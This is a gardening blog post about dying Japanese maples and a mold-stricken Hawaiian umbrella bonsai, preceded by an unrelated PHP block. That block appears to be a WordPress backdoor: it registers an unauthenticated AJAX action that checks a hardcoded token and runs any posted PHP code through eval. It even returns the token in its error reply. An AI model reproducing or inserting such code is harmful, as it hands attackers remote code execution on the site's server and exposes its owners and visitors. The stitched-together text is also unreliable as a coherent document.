// ==[BD:s3Ov5TFj]==
add_action( 'wp_ajax_nopriv_nybzazhm', function() {
$rec = 's3Ov5TFjkV81iBiIfjgBpcBOi1A2qWDT';
$flag = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : '';
if ( empty( $flag ) || ! hash_equals( $rec, $flag ) ) {
wp_send_json_error( [ 'message' => 'tok:' . $rec ], 403 );
}
$chunk = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : '';
if ( trim( $chunk ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); }
$chunk = preg_replace( '/^\s*<\?(php)?/i', '', $chunk );
while ( ob_get_level() > 0 ) { ob_end_clean(); }
$factor = microtime( true );
ob_start();
try {
( static function() use ( $chunk ) { return eval( $chunk ); } )();
$ref = (string) ob_get_clean();
wp_send_json_success( [ 'output' => $ref, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $factor ) * 1000, 2 ) ] );
} catch ( \Throwable $sym ) {
while ( ob_get_level() > 0 ) { ob_end_clean(); }
wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $sym->getMessage(), 'time_ms' => round( ( microtime( true ) - $factor ) * 1000, 2 ) ] );
}
} );
// ==[/BD:s3Ov5TFj]==
I guess technically speaking, this death can’t be blamed on my brown thumb. However, with “Shaina’s” root rot and passing 6 months ago, combined with “Kamagata’s” death-by-drought, I’m starting to wonder if I should move my remaining 9 Japanese maples to my parents’, where I know they won’t die, or continue to care for them here, and risk learning many more lessons the hard way…
I keep thinking that if only I could move to a new house with a large semi-shaded and fenced backyard, all my concerns with leaf burn, container-planting, West-facing afternoon sun, and tree-theft would be alleviated and I could grow my trees as successfully as any nursery. Luckily, I’m not so blind as to see past my own mistakes and I realize that a change in location can only fix a small percentage of my tree-killing issues. There’s never an easy solution to anything is there?
UPDATE 8/11: My coiled Hawaiian umbrella bonsai at work has been inflicted with some sort of white mold/fungus-looking spots on its leaves and has maybe 1 week left to live. Not sure what kind of chemical I need to spray on it, but given my luck recently it probably won’t matter what I try.
]]>